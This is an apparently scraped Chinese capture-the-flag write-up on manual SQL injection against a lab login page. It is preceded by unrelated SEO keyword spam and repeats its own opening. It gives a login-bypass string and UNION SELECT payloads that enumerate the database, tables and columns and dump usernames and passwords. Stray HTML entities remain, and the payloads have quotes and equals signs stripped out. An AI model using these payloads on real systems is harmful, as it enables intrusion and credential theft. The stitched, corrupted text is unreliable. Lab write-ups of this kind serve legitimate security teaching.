做梯子的企业网站,洛阳住房和城乡建设部网站,软件商城安装,wordpress互动游戏一、题目简介#xff1a; 二、通关思路#xff1a;
1、首先查看页面源代码#xff1a; 我们发现可以使用工具sqlmap来拿到flag#xff0c;我们先尝试手动注入。
2、 打开靶机#xff0c;映入眼帘的是登录界面#xff0c;首先尝试万能密码能否破解。
username: 1 or 11…一、题目简介 二、通关思路
1、首先查看页面源代码 我们发现可以使用工具sqlmap来拿到flag我们先尝试手动注入。
2、 打开靶机映入眼帘的是登录界面首先尝试万能密码能否破解。
username: 1 or 11 #
password: 随便写任意值
提交submit发现可以登录 并在 Your password 处发现一段乱码疑似为flag提交发现错误这并不是flag说明flag在别处。
3、通过万能密码已知注入类型为 字符型闭合方式为 单引号闭合尝试查看字段数量。
当 order by 3 时页面显示如图 当 order by 4 时页面显示如图 Unknown column 4说明页面报错了说明字段数为3。
注这里#使用URL编码格式% 十六进制数目的是防止被过滤在本题目中若使用 # 或 --是无法检测出字段数量的所以在以后的sql注入题目中最好使用%23。
4、查看回显
1 union select 1,2,3 %23 5、发现回显位 开始注出数据库库名表名列明最终拿到flag。
注出库名
1 union select 1,2,database() %23 注出表名
1 union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schemadatabase()) %23 注出列名
1 union select 1,2,(select group_concat(column_name)from information_schema.columns where table_namel0ve1ysq1) %23 拿到flag
1 union select 1,2,(select group_concat(id,username,password) from l0ve1ysq1) %23 成功拿到flag通关。